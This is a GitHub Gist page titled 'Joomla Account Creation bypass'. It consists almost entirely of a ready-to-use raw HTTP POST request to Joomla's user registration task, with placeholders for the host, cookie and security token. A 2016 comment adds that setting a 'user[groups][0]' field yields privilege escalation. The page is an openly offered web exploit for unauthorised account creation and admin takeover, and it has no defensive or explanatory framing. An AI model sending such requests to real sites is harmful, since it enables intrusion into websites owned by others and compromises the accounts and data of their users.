Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Joomla Account Creation bypass
POST /index.php?option=com_users&task=user.register HTTP/1.1
Host: [INSERT_HOST]
Referer: [INSERT_HOST]/index.php/component/users/?view=registration
Cookie: [INSERT_COOKIE]
Connection: close
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[name]"
hackers
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[username]"
hackers
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[password1]"
password
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[password2]"
password
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[email1]"
email@example.com
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[email2]"
email@example.com
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="option"
com_users
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="task"
user.register
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="[INSERT_SECURITY_TOKEN]"
1
------WebKitFormBoundarydPTNyMPMzmAhBsf4--
@sasqwatch

This comment has been minimized.

Copy link

commented Oct 26, 2016

name = "user[groups][0]" gets you privilege escalation.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.